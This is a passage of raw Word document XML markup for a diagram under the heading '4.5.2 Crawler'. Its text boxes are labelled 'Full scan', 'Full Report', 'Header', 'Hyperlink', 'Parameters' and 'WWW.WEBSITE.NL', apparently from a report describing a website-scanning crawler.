                <wp:effectExtent l="0" t="0" r="30480" b="25400"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="555" name="Text Box 555"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="756920" cy="2286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62BA211" w14:textId="4D85B169" w:rsidR="002A05E5" w:rsidRPr="009A3D6F" w:rsidRDefault="002A05E5">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ADA47" id="Text Box 555" o:spid="_x0000_s1112" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:3.95pt;margin-top:71.3pt;width:59.6pt;height:18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" filled="f" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="162BA211" w14:textId="4D85B169" w:rsidR="002A05E5" w:rsidRPr="009A3D6F" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Full Report</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252577792" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6FF28474" wp14:editId="40359256">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3288030</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>560705</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="821055" cy="568960"/>
                <wp:effectExtent l="0" t="0" r="17145" b="15240"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="158" name="Text Box 158"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="821055" cy="5689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9172301" w14:textId="1F51AB33" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Full scan</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="155CAC7B" w14:textId="1B218611" w:rsidR="002A05E5" w:rsidRPr="0022016D" w:rsidRDefault="002A05E5">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8474" id="Text Box 158" o:spid="_x0000_s1113" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:258.9pt;margin-top:44.15pt;width:64.65pt;height:44.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" filled="f" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="09172301" w14:textId="1F51AB33" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Full scan</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="155CAC7B" w14:textId="1B218611" w:rsidR="002A05E5" w:rsidRPr="0022016D" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Full Report</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252569600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1C4B3035" wp14:editId="032F1497">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1316990</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>554990</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="423545" cy="423545"/>
            <wp:effectExtent l="0" t="0" r="8255" b="825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ackage ic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9840" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3DC9BC78" wp14:editId="79C484FF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4429125</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>782955</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="378460" cy="4445"/>
                <wp:effectExtent l="0" t="127000" r="0" b="147955"/>
                <wp:wrapNone/>
                <wp:docPr id="164" name="Straight Arrow Connector 164"/>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1438B4" id="_x0000_t32" coordsize="21600,21600" o:spt="32" o:oned="t" path="m0,0l21600,21600e" filled="f">
                <v:path arrowok="t" fillok="f" o:connecttype="none"/>
                <o:lock v:ext="edit" shapetype="t"/>
              </v:shapetype>
              <v:shape id="Straight Arrow Connector 164" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;margin-left:348.75pt;margin-top:61.65pt;width:29.8pt;height:.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" strokecolor="#ffc000 [3207]" strokeweight="3pt">
                <v:stroke endarrow="block" joinstyle="miter"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252576768" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="08A626DA" wp14:editId="1BC543BE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1821180</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>785495</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="378460" cy="4445"/>
                <wp:effectExtent l="0" t="127000" r="0" b="147955"/>
                <wp:wrapNone/>
                <wp:docPr id="150" name="Straight Arrow Connector 150"/>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623FE" id="Straight Arrow Connector 150" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;margin-left:143.4pt;margin-top:61.85pt;width:29.8pt;height:.3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" strokecolor="#ffc000 [3207]" strokeweight="3pt">
                <v:stroke endarrow="block" joinstyle="miter"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="222D7399" w14:textId="0E7D545D" w:rsidR="00995B00" w:rsidRDefault="00995B00"/>
    <w:p w14:paraId="44B884D5" w14:textId="54F74DB0" w:rsidR="00995B00" w:rsidRDefault="00995B00"/>
    <w:p w14:paraId="75CCA775" w14:textId="77777777" w:rsidR="00995B00" w:rsidRDefault="00995B00"/>
    <w:p w14:paraId="474129AA" w14:textId="70CA4397" w:rsidR="00995B00" w:rsidRDefault="00995B00"/>
    <w:p w14:paraId="7B891599" w14:textId="14347FC6" w:rsidR="00FD24C9" w:rsidRDefault="00FD24C9"/>
    <w:p w14:paraId="0C382291" w14:textId="77777777" w:rsidR="00087E52" w:rsidRDefault="00087E52">
      <w:pPr>
        <w:sectPr w:rsidR="00087E52" w:rsidSect="0096760D">
          <w:headerReference w:type="default" r:id="rId59"/>
          <w:footerReference w:type="default" r:id="rId60"/>
          <w:headerReference w:type="first" r:id="rId61"/>
          <w:footerReference w:type="first" r:id="rId62"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="0" w:right="1418" w:bottom="0" w:left="1418" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C860A10" w14:textId="77777777" w:rsidR="0096760D" w:rsidRDefault="0096760D" w:rsidP="00B61721">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75C905DA" w14:textId="758D0511" w:rsidR="006E3A79" w:rsidRDefault="00087E52" w:rsidP="00B61721">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252645376" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="604FBE78" wp14:editId="63AC9781">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-897456</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1006976</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="219" name="Rectangle 2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19810" id="Rectangle 219" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.65pt;margin-top:-79.25pt;width:25pt;height:1031.7pt;z-index:-2506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USY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JcUG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" fillcolor="#ffd966 [1943]" strokecolor="#ffd966" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B568D8">
        <w:t>4.5</w:t>
      </w:r>
      <w:r w:rsidR="00161972">
        <w:t>.2</w:t>
      </w:r>
      <w:r w:rsidR="00D67CA9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006E3A79" w:rsidRPr="003D45FB">
        <w:t>Crawler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2259322F" w14:textId="3E710319" w:rsidR="00470AEB" w:rsidRPr="00470AEB" w:rsidRDefault="00470AEB" w:rsidP="00470AEB"/>
    <w:p w14:paraId="2A7FABF4" w14:textId="2D996AF1" w:rsidR="0018514B" w:rsidRDefault="00FA2A0D" w:rsidP="001B3C7D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2256"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252643328" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4B5BAFEC" wp14:editId="0C0A33D6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5196840</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4641215</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="825500" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="38100" b="25400"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="215" name="Text Box 215"/>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0F17658E" w14:textId="7E734579" w:rsidR="002A05E5" w:rsidRPr="00FA2A0D" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>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BAFEC" id="Text Box 215" o:spid="_x0000_s1114" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:409.2pt;margin-top:365.45pt;width:65pt;height:18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" filled="f" strokecolor="#ffc100">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0F17658E" w14:textId="7E734579" w:rsidR="002A05E5" w:rsidRPr="00FA2A0D" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Header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1280" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2DB1E50D" wp14:editId="13DD3B3B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5194300</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4984750</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="825500" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="38100" b="25400"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="211" name="Text Box 211"/>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4CED1145" w14:textId="0B191AD0" w:rsidR="002A05E5" w:rsidRPr="00C805F6" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Hyper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1E50D" id="Text Box 211" o:spid="_x0000_s1115" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:409pt;margin-top:392.5pt;width:65pt;height:18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" filled="f" strokecolor="#ffc100">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4CED1145" w14:textId="0B191AD0" w:rsidR="002A05E5" w:rsidRPr="00C805F6" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Hyperlink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2304" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="078711AC" wp14:editId="4B88CC46">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5200650</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>5328285</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="825500" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="38100" b="25400"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="212" name="Text Box 212"/>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7B18ECE" w14:textId="0B436850" w:rsidR="002A05E5" w:rsidRPr="00C805F6" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>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711AC" id="Text Box 212" o:spid="_x0000_s1116" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:409.5pt;margin-top:419.55pt;width:65pt;height:18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" filled="f" strokecolor="#ffc100">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="77B18ECE" w14:textId="0B436850" w:rsidR="002A05E5" w:rsidRPr="00C805F6" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Parameters</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00C805F6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252591104" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="249D860D" wp14:editId="1FD2A7F8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-447675</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2815590</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3362325" cy="3425190"/>
            <wp:effectExtent l="25400" t="25400" r="15875" b="29210"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="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62325" cy="3425190"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="28575">
                      <a:solidFill>
                        <a:srgbClr val="FFC100"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00E221BC">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251684852" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6018ED2F" wp14:editId="78CCB8EC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3160395</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3273425</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3175000" cy="2743200"/>
                <wp:effectExtent l="0" t="0" r="25400" b="25400"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21600"/>
                    <wp:lineTo x="21600" y="21600"/>
                    <wp:lineTo x="21600" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="208" name="Rectangle 208"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3175000" cy="2743200"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="accent4">
                            <a:lumMod val="60000"/>
                            <a:lumOff val="40000"/>
                          </a:schemeClr>
                        </a:solid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79F0F" id="Rectangle 208" o:spid="_x0000_s1026" style="position:absolute;margin-left:248.85pt;margin-top:257.75pt;width:250pt;height:3in;z-index:2516848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" fillcolor="#ffd966 [1943]" strokecolor="#ffc100" strokeweight="2.25pt">
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00E221BC">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251683827" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="265A4AF3" wp14:editId="7424365C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3036570</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2815590</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3429000" cy="3425190"/>
                <wp:effectExtent l="0" t="0" r="25400" b="29210"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="196" name="Rectangle 196"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3429000" cy="3425190"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:no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E3CC4" id="Rectangle 196" o:spid="_x0000_s1026" style="position:absolute;margin-left:239.1pt;margin-top:221.7pt;width:270pt;height:269.7pt;z-index:2516838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" filled="f" strokecolor="#ffc100" strokeweight="2.25pt">
                <w10:wrap type="square"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00E221BC">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252640256" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="25F7E89D" wp14:editId="60DF2A9F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4116705</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2924175</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1202690" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="16510" b="25400"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="204" name="Text Box 204"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1202690" cy="228600"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="accent4">
                            <a:lumMod val="60000"/>
                            <a:lumOff val="40000"/>
                          </a:schemeClr>
                        </a:solid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E4B0152" w14:textId="7EB22096" w:rsidR="002A05E5" w:rsidRPr="00E221BC" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>WWW.WEBSIT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7E89D" id="Text Box 204" o:spid="_x0000_s1117" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:324.15pt;margin-top:230.25pt;width:94.7pt;height:18pt;z-index:25264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" fillcolor="#ffd966 [1943]" strokecolor="#ffc100">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1E4B0152" w14:textId="7EB22096" w:rsidR="002A05E5" w:rsidRPr="00E221BC" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>WWW.WEBSITE.NL</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00E221BC">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252639232" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2CF2165B" wp14:editId="713499C1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>5122545</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>4175760</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="450850" cy="397510"/>
            <wp:effectExtent l="0" t="0" r="6350" b="889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7184" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6DA073B5" wp14:editId="2D069952">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>4488180</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3946525</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="450850" cy="397510"/>
            <wp:effectExtent l="0" t="0" r="6350" b="889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5136" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="092327E9" wp14:editId="5BC844DC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3916045</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3718560</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="450850" cy="397510"/>
            <wp:effectExtent l="0" t="0" r="6350" b="889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3088" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4A8F00FC" wp14:editId="3DBC4FBF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3346450</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3491865</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="450850" cy="397510"/>
            <wp:effectExtent l="0" t="0" r="6350" b="889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mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252631040" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7504102B" wp14:editId="3EACC9C4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5058410</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4069715</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1143000" cy="1714500"/>
                <wp:effectExtent l="0" t="0" r="25400" b="38100"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21760"/>
                    <wp:lineTo x="21600" y="21760"/>
                    <wp:lineTo x="21600" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="183" name="Rectangle 183"/>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FCBF3" id="Rectangle 183" o:spid="_x0000_s1026" style="position:absolute;margin-left:398.3pt;margin-top:320.45pt;width:90pt;height:135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8992" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1FEC473E" wp14:editId="5D69CB65">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4429125</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3842385</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1143000" cy="1714500"/>
                <wp:effectExtent l="0" t="0" r="25400" b="38100"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21760"/>
                    <wp:lineTo x="21600" y="21760"/>
                    <wp:lineTo x="21600" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="182" name="Rectangle 182"/>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6AD10" id="Rectangle 182" o:spid="_x0000_s1026" style="position:absolute;margin-left:348.75pt;margin-top:302.55pt;width:90pt;height:135pt;z-index:25262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4896" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="22D430DE" wp14:editId="6E942EEB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3286125</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3378835</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1143000" cy="1714500"/>
                <wp:effectExtent l="0" t="0" r="25400" b="38100"/>
